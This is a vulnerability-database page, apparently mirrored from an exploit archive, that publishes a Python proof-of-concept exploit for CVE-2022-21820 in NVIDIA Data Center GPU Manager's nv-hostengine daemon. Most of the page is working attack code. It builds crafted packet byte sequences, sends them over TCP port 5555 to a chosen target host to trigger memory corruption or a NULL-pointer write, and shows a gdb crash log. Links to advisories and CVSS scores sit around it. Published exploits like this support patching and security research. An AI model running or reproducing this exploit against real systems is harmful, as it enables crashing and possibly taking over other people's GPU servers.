NVIDIA Data Center GPU Manager Remote Memory Corruption Exploit

🗓️ 04 Jun 2022 00:00:00Reported by Jeremy BrownType

zdt🔗 0day.today👁 347 Views

NVIDIA DCGM Remote Memory Corruption Exploi

Reporter	Title	Published	Views	Family All 13
ATTACKERKB	CVE-2022-21820	24 Mar 202217:15	–	attackerkb
Circl	CVE-2022-21820	24 Mar 202219:29	–	circl
CNNVD	NVIDIA Data Center GPU Manager 输入验证错误漏洞	18 Mar 202200:00	–	cnnvd
CNVD	NVIDIA Data Center GPU Manager has an unspecified vulnerability	23 Mar 202200:00	–	cnvd
CVE	CVE-2022-21820	24 Mar 202217:05	–	cve
Cvelist	CVE-2022-21820	24 Mar 202217:05	–	cvelist
EUVD	EUVD-2022-26980	3 Oct 202520:07	–	euvd
NVD	CVE-2022-21820	24 Mar 202217:15	–	nvd
Nvidia	Security Bulletin: NVIDIA Data Center GPU Manager (DCGM) - March 2022	17 Mar 202200:00	–	nvidia
Packet Storm	NVIDIA Data Center GPU Manager Remote Memory Corruption	3 Jun 202200:00	–	packetstorm

#!/usr/bin/python3
# -*- coding: UTF-8 -*-
#
# heart.py
#
# NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health
# data. nv-hostengine is a daemon that by default listens on the loopback interface,
# but can also listen on the network for requests coming in on port 5555 (remote mgmt).
# A native client named DCGMI allows users to make requests to the daemon to support
# a variety of functions. Malformed packets can cause the daemon (running as root
# or user account) to crash or potentially result in code execution.
#
# More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html
#
# Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)
#
# $ ./heart.py 10.0.0.201 --trigger pkt3-mem
#
# $ gdb `which nv-hostengine`
# (gdb) r -b ALL -n
# nv-hostengine running as non-root. Some functionality will be limited.
# Started host engine version 2.3.1 using port number: 5555
# ...
# Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.
#
# (gdb) i r
# rax            0x7ffbb3dbd010      140719031046160
# rbx            0x7ffff771ac70      140737344810096
# rcx            0x7ffbb3dbd010      140719031046160
# rdx            0x424242420         17786217504
# rsi            0x7ffff771aee4      140737344810724
# rdi            0x7ffbb3dbd010      140719031046160
# rbp            0x7ffff771ac40      0x7ffff771ac40
# rsp            0x7ffff771abe8      0x7ffff771abe8
# r8             0x424242420         17786217504
# r9             0x0                 0
# r10            0x7ffbb3dbd010      140719031046160
#
# CVE‑2022‑21820
#

import os
import sys
import argparse
import time
import shutil
import signal
import socket

DEFAULT_PORT = 5555

PKT_START = b'\xad\xbc\xbc\xad'

#
# Trigger #1: Memory Corruption via malformed packet 3
#
TRIGGER_ONE_PKT_1 = PKT_START + \
                    b'\x01\x00\x00\x00\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x0f\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00'

TRIGGER_ONE_PKT_2 = PKT_START + \
                    b'\x01\x00\x00\x00\x1a\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0a\x18\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00\x48\xa4\xec\xc4\x94\x81\x83\xf5\x02'

# 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420
TRIGGER_ONE_PKT_3 = PKT_START + \
                    b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01\x00' + \
                    b'\x84' * 51 + \
                    b'\x00' * 488 + \
                    b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \
                    b'\x00' * 207 + \
                    b'\x01\x00\x00\x00'

#
# Trigger #2: NULL ptr write via malformed packet 4
#
TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1

TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2

TRIGGER_TWO_PKT_3 = PKT_START + \
                    b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01' + \
                    b'\x00' * 12 + \
                    b'\x01\x00\x00\x00\x01' + \
                    b'\x00' * 523 + \
                    b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \
                    b'\x00' * 207 + \
                    b'\x01\x00\x00\x00'

# 0x79 triggers crash
TRIGGER_TWO_PKT_4 = PKT_START + \
                    b'\x04\x00\x00\x00\x1c\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x1a\x08\x04\x10\x03\x18' + \
                    b'\xff' * 9 + \
                    b'\x01' + \
                    b'\x79' + \
                    b'\x00\x42\x07\xd2\x01\x04\x08\x03\x10\x00'

class Heart(object):
    def __init__(self, args):
        self.host = args.host
        self.trigger = args.trigger

    def run(self):
        if(self.trigger == None):
            print("error: choose which bug use via --trigger")
            return -1

        sock = self.getSock()

        if(sock == None):
            return -1

        try:
            sock.connect((self.host, DEFAULT_PORT))
        except Exception as error:
            print("connect() failed: %s\n" % error)
            return -1

        if(self.trigger == 'pkt3_mem'):
            if(self.sendPacket(sock, TRIGGER_ONE_PKT_1) < 0):
                print("failed to send/recv packet 1\n")
                return -1

            if(self.sendPacket(sock, TRIGGER_ONE_PKT_2) < 0):
                print("failed to send/recv packet 2\n")
                return -1

            if(self.sendPacket(sock, TRIGGER_ONE_PKT_3) < 0):
                print("failed to send/recv packet 3\n")
                return -1

        if(self.trigger == 'pkt4_null'):
            if(self.sendPacket(sock, TRIGGER_TWO_PKT_1) < 0):
                print("failed to send/recv packet 1\n")
                return -1

            if(self.sendPacket(sock, TRIGGER_TWO_PKT_2) < 0):
                print("failed to send/recv packet 2\n")
                return -1

            if(self.sendPacket(sock, TRIGGER_TWO_PKT_3) < 0):
                print("failed to send/recv packet 3\n")
                return -1

            if(self.sendPacket(sock, TRIGGER_TWO_PKT_4) < 0):
                print("failed to send/recv packet 4\n")
                return -1

        print("done\n")

        return 0

    def getSock(self):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(2)
        except Exception as error:
            print("socket() failed: %s\n" % error)
            return None

        return sock

    def sendPacket(self, sock, pkt):
        try:
            sock.send(pkt)
        except Exception as error:
            print("socket send error: %s\n" % error)
            return -1

        try:
            sock.recv(256)
        except Exception as error:
            # print("socket recv error: %s\n" % error)
            return 0 # expected for pkt3_mem

        return 0

def signalExit(signum, frame):
    sys.exit(-1)

def arg_parse():
    parser = argparse.ArgumentParser()

    parser.add_argument("host",
                        type=str,
                        help="target host")

    parser.add_argument("--trigger",
                        "--trigger",
              type=str,
              choices=['pkt3_mem', 'pkt4_null'],
              help="which bug to trigger")

    args = parser.parse_args()

    return args

def main():
    signal.signal(signal.SIGINT, signalExit)

    args = arg_parse()

    rh = Heart(args)

    result = rh.run()

    if(result > 0):
        sys.exit(-1)

if(__name__ == '__main__'):
    main()

04 Jun 2022 00:00Current

0.4Low risk

Vulners AI Score0.4

CVSS 3.16.3

CVSS 26.5

EPSS0.00619